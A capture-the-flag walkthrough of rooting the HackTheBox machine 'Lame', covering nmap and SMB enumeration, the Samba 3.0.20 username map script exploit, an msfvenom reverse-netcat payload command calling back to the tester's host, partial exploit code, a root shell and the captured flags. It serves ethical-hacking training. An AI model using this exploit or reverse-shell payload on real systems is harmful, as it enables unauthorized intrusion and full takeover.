5 minute read

Introduction

This article will be a walkthrough on the methodology that was used to gain root access on the Linux machine named “Lame” on HackTheBox platform.

Disclaimer As with all things related to ethical hacking, this machine is an intentionally vulnerable machine, whose purpose is to learn ethical hacking techniques. The techniques mentioned should NOT be used for illegal purposes, and should NOT be used on machines without prior authorization from the machine owner.

Methodology

Scanning and Enumeration

Let’s connect to the vpn network if you haven’t yet. I have already connected to my network, and my IP is at 10.10.14.6. The target machine should be present at 10.10.10.3.

Let’s scan all the TCP ports, to find interesting information present on those ports:

> sudo nmap -sS -T4 -p- -A 10.10.10.3 -oA scanningAndEnumeration/lameTcpPortsAll

[sudo] password for kali:

 Starting Nmap 7.91 ( https://nmap.org ) at 2020–12–11 12:32 EST
 Nmap scan report for 10.10.10.3
 Host is up (0.27s latency).
 Not shown: 65530 filtered ports
 PORT STATE SERVICE VERSION
 21/tcp open ftp vsftpd 2.3.4
 |ftp-anon: Anonymous FTP login allowed (FTP code 230)
 | ftp-syst:
 | STAT:
 | FTP server status:
 | Connected to 10.10.14.6
 | Logged in as ftp
 | TYPE: ASCII
 | No session bandwidth limit
 | Session timeout in seconds is 300
 | Control connection is plain text
 | Data connections will be plain text
 | vsFTPd 2.3.4 — secure, fast, stable
 |End of status
 <!==snip==
 139/tcp open netbios-ssn Samba smbd 3.X — 4.X (workgroup: WORKGROUP)
 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4–1ubuntu4))<!==snip==
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linuxkernel
 Host script results:
 |clock-skew: mean: 2h33m59s, deviation: 3h32m11s, median: 3m56s
 | smb-os-discovery:
 | OS: Unix (Samba 3.0.20-Debian)
 | Computer name: lame
 | NetBIOS computer name:
 | Domain name: hackthebox.gr
 | FQDN: lame.hackthebox.gr
 | System time: 2020–12–11T12:42:49–05:00
 | smb-security-mode:
 | accountused: guest
 | authenticationlevel: user
 | challengeresponse: supported
 | messagesigning: disabled (dangerous, but default)
 |smb2-time: Protocol negotiation failed (SMB2)
 TRACEROUTE (using port 445/tcp)
 HOP RTT ADDRESS
 1 268.37 ms 10.10.14.1
 2 268.31 ms 10.10.10.3
 <!==snip==

We see a lot ports open here. For example, we now know that its a Linux machine (Looking at the smb-os-discovery nmap script output). It is also running SSH and SMB (Samba).  We could try to connect to an SMB share using smbclient:

> smbclient -L \\\\\\\10.10.10.3\\\

  Enter WORKGROUP\\kali’s password: 
  Anonymous login successful
  
  Sharename Type Comment
  — — — — — — — — — — -
  print$ Disk Printer Drivers
  tmp Disk oh noes!
  opt Disk 
  IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
  ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
  Reconnecting with SMB1 for workgroup listing.
  Anonymous login successful
  
  Server Comment
  — — — — — — — — -
  
  Workgroup Master
  — — — — — — — — -
  WORKGROUP LAME

We are able to connect as an anonymous user! This is a serious issue, and should definitely be addressed to the client, if this were an actual penetration test. Let’s try connecting to the temporary folder /tmp on the victim machine

> smbclient -N \\\\\\\10.10.10.3\\\tmp

  Anonymous login successful
  Try “help” to get a list of possible commands.
  smb: \\ ls
  . D 0 Sat Dec 12 03:23:07 2020
  .. DR 0 Sat Oct 31 03:33:58 2020
  .ICE-unix DH 0 Sat Dec 12 02:19:02 2020
  vmware-root DR 0 Sat Dec 12 02:19:34 2020
  .X11-unix DH 0 Sat Dec 12 02:19:29 2020
  .X0-lock HR 11 Sat Dec 12 02:19:29 2020
  5562.jsvcup R 0 Sat Dec 12 02:20:07 2020
  vgauthsvclog.txt.0 R 1600 Sat Dec 12 02:19:00 2020
  
  7282168 blocks of size 1024. 5386548 blocks available

We see a bunch of files present here, but nothing of interesting nature. We could try to upload files as well, by using the “put” command.


> Create a file named test.txt

 (kali㉿kali)-[~/peh/lame]
  └─$ echo “hello”  test.txt

> Upload test.txt

  ┌──(kali㉿kali)-[~/peh/lame]
  └─$ smbclient -N \\\\\\\\10.10.10.3\\\\tmp
  Anonymous login successful
  Try “help” to get a list of possible commands.
  smb: \ put test.txt
 putting file test.txt as \\test.txt (0.0 kb/s) (average 0.0 kb/s)
  smb: \ ls
  . D 0 Sat Dec 12 03:24:58 2020
  .. DR 0 Sat Oct 31 03:33:58 2020
  .ICE-unix DH 0 Sat Dec 12 02:19:02 2020
  vmware-root DR 0 Sat Dec 12 02:19:34 2020
  .X11-unix DH 0 Sat Dec 12 02:19:29 2020
  .X0-lock HR 11 Sat Dec 12 02:19:29 2020
  5562.jsvcup R 0 Sat Dec 12 02:20:07 2020
 test.txt A 6 Sat Dec 12 03:24:58 2020
  vgauthsvclog.txt.0 R 1600 Sat Dec 12 02:19:00 2020
  
  7282168 blocks of size 1024. 5386544 blocks available

The file was uploaded successfully ! That’s bad security practices. Address this immediately to the client!

We could enumerate even further to gather additional information (And you should, if this were a real pentest). But now, let’s get to the next phase of our test — Exploitation.

Exploitation

We have a nifty tool on Kali called “searchsploit”, that automatically searches for an exploit on the local machine, using a given keyword.


> searchsploit samba 3.0.20
  — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
  Exploit Title | Path
  — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
 Samba 3.0.10 < 3.3.5 — Format String / Security Bypass | multiple/remote/10095.txt
 Samba 3.0.20 < 3.0.25rc3 — ‘Username’ map script’ Command Execution (Metasploit) | unix/remote/16320.rb
 Samba < 3.0.20 — Remote Heap Overflow | linux/remote/7701.txt
 Samba < 3.0.20 — Remote Heap Overflow | linux/remote/7701.txt
 Samba < 3.6.2 (x86) — Denial of Service (PoC) | linuxx86/dos/36741.py
  — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
 Shellcodes: No Results

This exploit is written in ruby, and can be used against the target. A little bit of googling, and you may come across another version on github that does the same thing, but it is written in python. Reference — https://gist.github.com/joenorton8014/19aaa00e0088738fc429cff2669b9851#file-samba-usermap-exploit-py

Let’s create our shellcode:

msfvenom -p cmd/unix/reversenetcat LHOST=10.10.14.6 LPORT=9999 -f python

Done!. Now replace the shellcode into the python exploit from earlier, and you would get a shell!. I have not pasted the entire code here, but you could take this as a reference.

 !/usr/bin/python
  
  from smb.SMBConnection import SMBConnection
  import random, string
  from smb import smbstructs
  smbstructs.SUPPORTSMB2 = False
  import sys
  
  
  # Just a python version of a very simple Samba exploit. 
  # It doesn’t have to be pretty because the shellcode is executed
  # in the username field. 
  
  # Based off this Metasploit module — [https://www.exploit-db.com/exploits/16320/](https://www.exploit-db.com/exploits/16320/) 
  
 < snip

 \# Shellcode: 
  # msfvenom -p cmd/unix/reversenetcat LHOST=10.0.0.35 LPORT=9999 -f python
  
 buf = “”
  buf += \\x6d\\x6b\\x66\\x69\\x66\\x6f\\x20\\x2f\\x74\\x6d\\x70\\x2f\\x6b
  <! — snip 
  buf += \\x20
  
  
  < snip

Let’s get our shell! This shell gives us root privileges.

Run the exploit:

python pySMBUserMap.py 10.10.10.3

Get a shell. Grab the root and user flags, and submit them to HTB.

 (kali㉿kali)-[~]
  └─$ nc -nvlp 9999 
  listening on [any] 9999 …
  connect to [10.10.14.6] from (UNKNOWN) [10.10.10.3] 57217
  pwd
  /
  whoami
  root
  hostname
  lame
  root@lame:/root# cat root.txt
  b2b3501b249d8040f5e5d316ed8fff14
  root@lame:/root# 
  root@lame:/home/makis# cat user.txt
  0e07ee8a05af02903c05cb84966bdfa7
 root@lame:/home/makis#

That’s how you go about rooting this box. Hope this was helpful!

Tags:

Categories:

Updated: